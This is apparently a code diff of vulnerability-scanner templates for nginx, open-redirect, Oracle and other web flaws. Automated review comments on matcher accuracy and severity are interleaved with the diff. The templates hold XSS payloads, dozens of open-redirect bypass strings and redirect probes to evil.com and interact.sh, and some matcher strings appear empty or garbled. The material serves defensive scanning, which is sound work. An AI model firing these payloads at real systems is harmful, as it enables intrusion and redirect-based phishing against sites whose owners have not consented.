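Review bot: The new side of `poc/nginx/nginx-config.yaml` removes the negative word matcher on `html>`, so the template now fires on any 200 response at `/nginx.conf` that contains `server`, `listen` and `server_name`, including an HTML page that merely mentions those words. Restore the removed matcher (the `- type: word` entry on `"html>"` with `negative: true`) to keep the false-positive rate down. The co-author credit `geeknik` is also dropped from `author`, which looks unintended.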
@@ -1,41 +1,18 @@ id: nginx-module-vts-xss - info: - name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting - author: madrobot,j4vaovo - severity: high - description: Nginx Virtual Host Traffic Status Module contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks. - reference: - - https://github.com/vozlt/nginx-module-vts - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - metadata: - max-request: 2 - tags: nginx,xss,status - -http: - - raw: - - | - GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - - | - GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - + name: Nginx virtual host traffic status module XSS + author: madrobot + severity: medium +requests: + - method: GET + path: + - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E" matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_2 == 200" - - "contains(header_2, 'text/html')" - - "contains(tolower(body_2), '')" - condition: and - - - type: dsl - dsl: - - "!contains(tolower(body_1), '')" - condition: and - -# digest: 4a0a00473045022100bef45d36680d708495ed8789f663d812bf77ddc8302ba5453b03064d854396940220096f5be895895b9b295c6e4a0a68259b2606c6b857da24f5b78ecfe880647b7f:922c64590222798bb761d5b6d8e72950 + - type: status + status: + - 200 + - type: word + words: + - "" + part: body diff --git a/poc/nginx/nginx-proxy-manager-9111.yaml b/poc/nginx/nginx-proxy-manager-9111.yaml index 5a960423df..6eaa832afd 100644 --- a/poc/nginx/nginx-proxy-manager-9111.yaml +++ b/poc/nginx/nginx-proxy-manager-9111.yaml 
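Review bot: The rewritten matchers in `poc/nginx/nginx-module-vts-xss-9108.yaml` no longer check the response content type. The old side required `contains(header_2, 'text/html')` plus a negative baseline on the 404 probe, while the new side accepts status 200 and a body word. A payload echoed in a non-HTML response is not rendered by a browser, so this will report reflections that are not exploitable; add a word matcher with `part: header` on `"text/html"`. The new `info` block also has no `tags`, `description` or `reference`, and the trailing `# digest:` line is removed, so the template is no longer signed.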
@@ -1,15 +1,17 @@ id: nginx-proxy-manager + info: name: Nginx Proxy Manager author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"Nginx Proxy Manager" + reference: https://www.shodan.io/search?query=http.title%3A%22Nginx+Proxy+Manager%22 tags: panel,nginx,proxy + requests: - method: GET path: - '{{BaseURL}}/login' + matchers-condition: and matchers: - type: word diff --git a/poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml b/poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml index d229013dd5..dd6e155d1a 100644 --- a/poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml +++ b/poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml @@ -1,24 +1,20 @@ -id: unauthorized-puppet-node-manager - -info: - name: Pupet Node Manager - author: pussycat0x - severity: medium - metadata: - fofa-dork: 'app="puppet-Node-Manager"' - tags: node,misconfig - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Nodes' - - - type: status - status: - - 200 +id: unauthorized-puppet-node-manager +info: + name: Pupet Node Manager + author: pussycat0x + severity: medium + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,misconfig +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'Nodes' + - type: status + status: + - 200 diff --git a/poc/open_redirect/dedecms-openredirect.yaml b/poc/open_redirect/dedecms-openredirect.yaml index d00f523db7..75c8bb810b 100644 --- a/poc/open_redirect/dedecms-openredirect.yaml +++ b/poc/open_redirect/dedecms-openredirect.yaml 
@@ -1,24 +1,24 @@ id: dedecms-openredirect - info: name: DedeCMS Open Redirect author: pikpikcu severity: low - reference: https://blog.csdn.net/ystyaoshengting/article/details/82734888 + reference: + - https://blog.csdn.net/ystyaoshengting/article/details/82734888 + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms,redirect - requests: - method: GET path: - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=" - matchers-condition: and matchers: - type: word words: - "Location: https://evil.com" part: header - - type: status status: - 302 diff --git a/poc/open_redirect/netsweeper-open-redirect.yaml b/poc/open_redirect/netsweeper-open-redirect.yaml index 11988b3f68..b1dbdbf43a 100644 --- a/poc/open_redirect/netsweeper-open-redirect.yaml +++ b/poc/open_redirect/netsweeper-open-redirect.yaml @@ -1,17 +1,21 @@ id: netsweeper-open-redirect + info: name: Netsweeper 4.0.9 - Open Redirection author: daffainfo severity: medium description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. - reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz tags: netsweeper,redirect + requests: - method: GET path: - - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/" + - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/" + matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/poc/open_redirect/newsletter-open-redirect.yaml b/poc/open_redirect/newsletter-open-redirect.yaml index 986f6ae231..e391d3ecaf 100644 --- a/poc/open_redirect/newsletter-open-redirect.yaml +++ b/poc/open_redirect/newsletter-open-redirect.yaml 
@@ -1,22 +1,20 @@ id: newsletter-open-redirect + info: - name: WordPress Newsletter Manager < 1.5 - Unauthenticated Open Redirect + name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect author: dhiyaneshDk severity: medium - description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the header() PHP function, leading to an open redirect issue. - reference: - - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 - classification: - cwe-id: CWE-601 + description: The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue. + reference: https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 tags: wordpress,redirect,wp-plugin,newsletter,wp + requests: - method: GET path: - - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo" + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ==" + matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/04/13 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file diff --git a/poc/open_redirect/odoo-cms-redirect.yaml b/poc/open_redirect/odoo-cms-redirect.yaml index c16827e2db..f81388034c 100644 --- a/poc/open_redirect/odoo-cms-redirect.yaml +++ b/poc/open_redirect/odoo-cms-redirect.yaml 
@@ -1,12 +1,10 @@ id: odoo-cms-redirect info: - name: Odoo CMS - Open Redirect + name: Odoo CMS - Open redirection all Version author: 0x_Akoko + description: Odoo CMS - Open redirection all Version. + reference: https://cxsecurity.com/issue/WLB-2021020143 severity: low - description: Odoo CMS - Open redirection in all versions due to Odoo's policy. - reference: - - https://cxsecurity.com/issue/WLB-2021020143 - - https://www.odoo.com/page/security-nonvuln-redirectors tags: odoo,redirect requests: - method: GET diff --git a/poc/open_redirect/open-redirect-9308.yaml b/poc/open_redirect/open-redirect-9308.yaml index 52afa349a8..6a6f5a75ff 100644 --- a/poc/open_redirect/open-redirect-9308.yaml +++ b/poc/open_redirect/open-redirect-9308.yaml 
@@ -6,112 +6,39 @@ info: description: A user-controlled input redirects users to an external website. tags: redirect,generic requests: - - raw: - - | - GET /{{redirect}} HTTP/1.1 - Host: {{Hostname}} - payloads: - redirect: - - '%0a/interact.sh/' - - '%0d/interact.sh/' - - '%00/interact.sh/' - - '%09/interact.sh/' - - '%5C%5Cinteract.sh/%252e%252e%252f' - - '%5Cinteract.sh' - - '%5cinteract.sh/%2f%2e%2e' - - '%5c{{RootURL}}interact.sh/%2f%2e%2e' - - '../interact.sh' - - '.interact.sh' - - '/%5cinteract.sh' - - '////\;@interact.sh' - - '////interact.sh' - - '///interact.sh' - - '///interact.sh/%2f%2e%2e' - - '///interact.sh@//' - - '///{{RootURL}}interact.sh/%2f%2e%2e' - - '//;@interact.sh' - - '//\/interact.sh/' - - '//\@interact.sh' - - '//\interact.sh' - - '//\tinteract.sh/' - - '//interact.sh/%2F..' - - '//interact.sh//' - - '//%69%6e%74%65%72%61%63%74%2e%73%68' - - '//interact.sh@//' - - '//interact.sh\tinteract.sh/' - - '//https://interact.sh@//' - - '/<>//interact.sh' - - '/\/\/interact.sh/' - - '/\/interact.sh' - - '/\interact.sh' - - '/interact.sh' - - '/interact.sh/%2F..' 
- - '/interact.sh/' - - '/interact.sh/..;/css' - - '/https:interact.sh' - - '/{{RootURL}}interact.sh/' - - '/〱interact.sh' - - '/〵interact.sh' - - '/ゝinteract.sh' - - '/ーinteract.sh' - - '/ーinteract.sh' - - '<>//interact.sh' - - '@interact.sh' - - '@https://interact.sh' - - '\/\/interact.sh/' - - 'interact%E3%80%82sh' - - 'interact.sh' - - 'interact.sh/' - - 'interact.sh//' - - 'interact.sh;@' - - 'https%3a%2f%2finteract.sh%2f' - - 'https:%0a%0dinteract.sh' - - 'https://%0a%0dinteract.sh' - - 'https://%09/interact.sh' - - 'https://%2f%2f.interact.sh/' - - 'https://%3F.interact.sh/' - - 'https://%5c%5c.interact.sh/' - - 'https://%5cinteract.sh@' - - 'https://%23.interact.sh/' - - 'https://.interact.sh' - - 'https://////interact.sh' - - 'https:///interact.sh' - - 'https:///interact.sh/%2e%2e' - - 'https:///interact.sh/%2f%2e%2e' - - 'https:///interact.sh@interact.sh/%2e%2e' - - 'https:///interact.sh@interact.sh/%2f%2e%2e' - - 'https://:80#@interact.sh/' - - 'https://:80?@interact.sh/' - - 'https://:@\@interact.sh' - - 'https://:@interact.sh\@interact.sh' - - 'https://:@interact.sh\@WillBeReplaced.com' - - 'https://;@interact.sh' - - 'https://\tinteract.sh/' - - 'https://interact.sh/interact.sh' - - 'https://interact.sh/https://interact.sh/' - - 'https://www.\.interact.sh' - - 'https:/\/\interact.sh' - - 'https:/\interact.sh' - - 'https:/interact.sh' - - 'https:interact.sh' - - '{{RootURL}}interact.sh' - - '〱interact.sh' - - '〵interact.sh' - - 'ゝinteract.sh' - - 'ーinteract.sh' - - 'ーinteract.sh' - - 
'?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh' + - method: GET + path: + - '{{BaseURL}}/example.com/' + - '{{BaseURL}}/example.com//' + - '{{BaseURL}}///;@example.com' + - '{{BaseURL}}///example.com/%2F..' + - '{{BaseURL}}/////example.com' + - '{{BaseURL}}//example.com/%2F..' 
+ - '{{BaseURL}}//example.com/..;/css' + - '{{BaseURL}}/example%E3%80%82com' + - '{{BaseURL}}/%5Cexample.com' + - '{{BaseURL}}/example.com' + - '{{BaseURL}}//example.com/' + - '{{BaseURL}}/%00/example.com/' + - '{{BaseURL}}/%09/example.com/' + - '{{BaseURL}}/%0a/example.com/' + - '{{BaseURL}}/%0d/example.com/' + - '{{BaseURL}}////example.com/%2f%2e%2e' + - '{{BaseURL}}/%5cexample.com/%2f%2e%2e' + - '{{BaseURL}}/{{BaseURL}}example.com' + - '{{BaseURL}}//{{BaseURL}}example.com/' + - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e' + - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e' + - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' 
+ - '{{BaseURL}}/1/_https@example.com' stop-at-first-match: true matchers-condition: and matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header - type: status status: - - 301 - 302 - - 307 - - 308 - condition: or + - 301 diff --git a/poc/open_redirect/otobo-open-redirect-9411.yaml b/poc/open_redirect/otobo-open-redirect-9411.yaml index ef4fc620dc..ca7d3701d7 100644 --- a/poc/open_redirect/otobo-open-redirect-9411.yaml +++ b/poc/open_redirect/otobo-open-redirect-9411.yaml @@ -5,8 +5,8 @@ info: severity: medium description: There is a open redirect vulnerability in Otobo reference: - - https://huntr.dev/bounties/de64ac71-9d06-47cb-b643-891db02f2a1f/ - https://github.com/rotheross/otobo + - https://huntr.dev/bounties/de64ac71-9d06-47cb-b643-891db02f2a1f/ tags: redirect,otobo requests: - method: GET @@ -14,6 +14,6 @@ requests: - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com' matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/poc/open_redirect/pieregister-open-redirect.yaml b/poc/open_redirect/pieregister-open-redirect.yaml index 294b47b3a1..9c51ff20f2 100644 --- a/poc/open_redirect/pieregister-open-redirect.yaml +++ b/poc/open_redirect/pieregister-open-redirect.yaml 
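Review bot: Two changes in the new `requests` block of poc/open_redirect/open-redirect-9308.yaml reduce coverage. The status matcher now lists only `302` and `301`, so redirects answered with 307 or 308, which the removed list covered, are no longer reported; keep `- 307` and `- 308`. In the long query-string path the text after `dest_url=example.com` reads `&diexample.com`, where the removed payload had `&dir=interact.sh`, so the `dir` parameter is no longer tested; it should read `&dir=example.com`. The new Location regex ends in `example\.com.*$`, which is looser than the removed `\/?(\/|[^.].*)?$` tail and also accepts a host that merely starts with `example.com.`, so I would keep the stricter tail.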
@@ -1,23 +1,22 @@ id: pieregister-open-redirect + info: - name: WordPress Pie Register < 3.7.2.4 - Open Redirect - author: 0x_Akoko + name: Pie Register < 3.7.2.4 - Open Redirect severity: low - description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + author: 0x_Akoko + description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue. reference: - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 - https://wordpress.org/plugins/pie-register/ - classification: - cwe-id: CWE-601 tags: wordpress,redirect,wp-plugin,pieregister + requests: - method: GET path: - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" + matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - -# Enhanced by mp on 2022/04/13 diff --git a/poc/open_redirect/pollbot-redirect-9623.yaml b/poc/open_redirect/pollbot-redirect-9623.yaml index 3963874ef9..c11e6df5d3 100644 --- a/poc/open_redirect/pollbot-redirect-9623.yaml +++ b/poc/open_redirect/pollbot-redirect-9623.yaml @@ -1,4 +1,5 @@ id: pollbot-redirect + info: name: Mozilla Pollbot Services - Unauthenticated Open Redirect author: Evan Rubinstien 
@@ -8,16 +9,19 @@ info: - https://bugzilla.mozilla.org/show_bug.cgi?id=1753838 - https://github.com/mozilla/PollBot tags: redirect,mozilla,pollbot + requests: - method: GET path: - - '{{BaseURL}}/%0A/interact.sh/' + - '{{BaseURL}}/%0A/example.com/' + matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - type: status status: - 301 diff --git a/poc/open_redirect/sap-redirect-10066.yaml b/poc/open_redirect/sap-redirect-10066.yaml index 906e0b928c..6b87d06067 100644 --- a/poc/open_redirect/sap-redirect-10066.yaml +++ b/poc/open_redirect/sap-redirect-10066.yaml @@ -1,25 +1,19 @@ id: sap-redirect - info: name: SAP wide open redirect author: Gal Nagli severity: medium description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. tags: redirect,sap - requests: - method: GET - path: - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com" - matchers-condition: and matchers: - - type: status status: - 302 - - type: word words: - "Location: https://www.example.com" diff --git a/poc/open_redirect/thinkific-redirect-10732.yaml b/poc/open_redirect/thinkific-redirect-10732.yaml index a5baf35e95..05a87a54d0 100644 --- a/poc/open_redirect/thinkific-redirect-10732.yaml +++ b/poc/open_redirect/thinkific-redirect-10732.yaml @@ -6,11 +6,12 @@ info: severity: medium tags: redirect + requests: - method: GET path: - - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh" + - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com" matchers-condition: and matchers: @@ -19,6 +20,6 @@ requests: - 302 - type: word words: - - "*/;top.alert(2)//" part: body - - type: word words: - "text/html" 
diff --git a/poc/oracle/default-oracle-application-page-6891.yaml b/poc/oracle/default-oracle-application-page-6891.yaml index e96a481921..263c5493f5 100644 --- a/poc/oracle/default-oracle-application-page-6891.yaml +++ b/poc/oracle/default-oracle-application-page-6891.yaml @@ -1,10 +1,12 @@ id: default-oracle-application-page + info: name: Oracle Application Server Containers author: dhiyaneshDk severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 tags: tech,oracle + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 + requests: - method: GET path: diff --git a/poc/oracle/oracle-dbcs-9355.yaml b/poc/oracle/oracle-dbcs-9355.yaml index 4dd45891c6..29a3ed7ae9 100644 --- a/poc/oracle/oracle-dbcs-9355.yaml +++ b/poc/oracle/oracle-dbcs-9355.yaml @@ -1,23 +1,20 @@ -id: oracle-dbcs -info: - name: Oracle Database as a Service - author: pussycat0x - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 - tags: oracle,tech - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Oracle Database as a Service' - part: body - - - type: status - status: - - 200 +id: oracle-dbcs +info: + name: Oracle Database as a Service + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 + tags: oracle,tech +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle Database as a Service' + part: body + - type: status + status: + - 200 diff --git a/poc/oracle/oracle-ebs-xss-9375.yaml b/poc/oracle/oracle-ebs-xss-9375.yaml index 8c5ff6abb9..b684437823 100644 --- a/poc/oracle/oracle-ebs-xss-9375.yaml +++ b/poc/oracle/oracle-ebs-xss-9375.yaml 
@@ -1,25 +1,29 @@ id: oracle-ebs-xss + info: - name: Oracle EBS - Cross-Site Scripting + name: Oracle EBS XSS author: dhiyaneshDk severity: medium + tags: oracle,xss,ebs reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf - tags: oracle,xss,ebs + requests: - method: GET path: - "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" + matchers-condition: and matchers: - type: word words: - "" part: body + - type: status status: - 200 diff --git a/poc/oracle/oracle-fatwire-lfi.yaml b/poc/oracle/oracle-fatwire-lfi.yaml index 6038f21723..e014de6a11 100644 --- a/poc/oracle/oracle-fatwire-lfi.yaml +++ b/poc/oracle/oracle-fatwire-lfi.yaml @@ -2,15 +2,10 @@ id: oracle-fatwire-lfi info: name: Oracle Fatwire 6.3 - Path Traversal author: Bernardo Rodrigues @bernardofsr - severity: high - description: | - Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint. + severity: critical + description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint reference: - https://www.exploit-db.com/exploits/50167 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 tags: lfi,oracle,fatwire requests: - method: GET @@ -25,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/30 
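Review bot: `severity` in poc/oracle/oracle-fatwire-lfi.yaml is raised from `high` to `critical` in the same hunk that deletes the `classification` block, which scored the issue at `cvss-score: 8.6` with `C:H/I:N/A:N`. The description still describes a path traversal in the getSurvey.jsp endpoint, and the removed vector rates it confidentiality-only, so `severity: high` is the value the page's own evidence supports. I would keep `high` and retain `cwe-id: CWE-22` so findings from this template are prioritised consistently with the rest of the set. The `requests` block continues outside the hunk.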
diff --git a/poc/oracle/oracle-iplanet-web-server-9393.yaml b/poc/oracle/oracle-iplanet-web-server-9393.yaml index 8bd76eabb4..dcf6b13bc8 100644 --- a/poc/oracle/oracle-iplanet-web-server-9393.yaml +++ b/poc/oracle/oracle-iplanet-web-server-9393.yaml @@ -1,21 +1,26 @@ id: oracle-iplanet-web-server + info: name: Detect Oracle-iPlanet-Web-Server author: pussycat0x severity: info - metadata: - fofa-query: app="Oracle-iPlanet-Web-Server tags: tech,oracle + metadata: + fofa-query: 'app="Oracle-iPlanet-Web-Server' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word + part: body words: - "Oracle iPlanet Web Server" + - type: status status: - 200 diff --git a/poc/oracle/oracle-people-enterprise-9398.yaml b/poc/oracle/oracle-people-enterprise-9398.yaml index 90f42929ea..8f732871c5 100644 --- a/poc/oracle/oracle-people-enterprise-9398.yaml +++ b/poc/oracle/oracle-people-enterprise-9398.yaml @@ -4,8 +4,7 @@ info: name: Oracle Peoplesoft Enterprise author: dhiyaneshDk severity: info - metadata: - shodan-query: http.title:"Oracle Peoplesoft Enterprise" + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 tags: oracle,login,panel requests: diff --git a/poc/oracle/oracle-siebel-xss.yaml b/poc/oracle/oracle-siebel-xss.yaml index 2de4a62dca..8185fb2460 100644 --- a/poc/oracle/oracle-siebel-xss.yaml +++ b/poc/oracle/oracle-siebel-xss.yaml 
@@ -1,19 +1,11 @@ id: oracle-siebel-xss info: - name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting + name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability author: dhiyaneshDK - severity: high - description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. - reference: - - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - - https://exploit-db.com/exploits/47762 - - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - remediation: Upgrade to Siebel Loyalty version 8.2 or later. - tags: xss,oracle,siebel + severity: medium + description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. + reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html + tags: xss,oracle requests: - method: GET path: @@ -30,5 +22,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/poc/other/X-Remote-Addr .yaml b/poc/other/X-Remote-Addr .yaml index b7445e1257..34bd10143c 100644 --- a/poc/other/X-Remote-Addr .yaml +++ b/poc/other/X-Remote-Addr .yaml @@ -16,4 +16,4 @@ requests: matchers: - type: word words: - - "evil.com" + - "evil" diff --git a/poc/other/adiscon-loganalyzer-70.yaml b/poc/other/adiscon-loganalyzer-70.yaml index fc33d1db2a..d9d8c2d112 100644 --- a/poc/other/adiscon-loganalyzer-70.yaml +++ b/poc/other/adiscon-loganalyzer-70.yaml 
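Review bot: Shortening the matched word from `evil.com` to `evil` in `poc/other/X-Remote-Addr .yaml` makes the matcher fire on any response that happens to contain that substring (for example `devil`), since the visible matcher has no `part` or status restriction. Keep the full injected value, `- "evil.com"`, so a match still indicates that the header value was reflected. The request that sets the header starts above the hunk, so the exact injected value should be confirmed there.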
@@ -1,37 +1,19 @@ id: adiscon-loganalyzer info: - name: Adiscon LogAnalyzer Detection - author: geeknik - severity: high - description: Adiscon LogAnalyzer was discovered. Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events and reporting services. - reference: - - https://loganalyzer.adiscon.com/ - tags: adiscon,loganalyzer,syslog,exposures - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Adiscon LogAnalyzer' - - 'value="SYSLOG"' - - 'value="EVTRPT"' - - 'value="WEBLOG"' - condition: and - - type: status - status: - - 200 - - type: word - part: header - words: - - 'text/html' - -# Enhanced by mp on 2022/03/20 + name: adiscon-loganalyzer + author: cn-kali-team + tags: 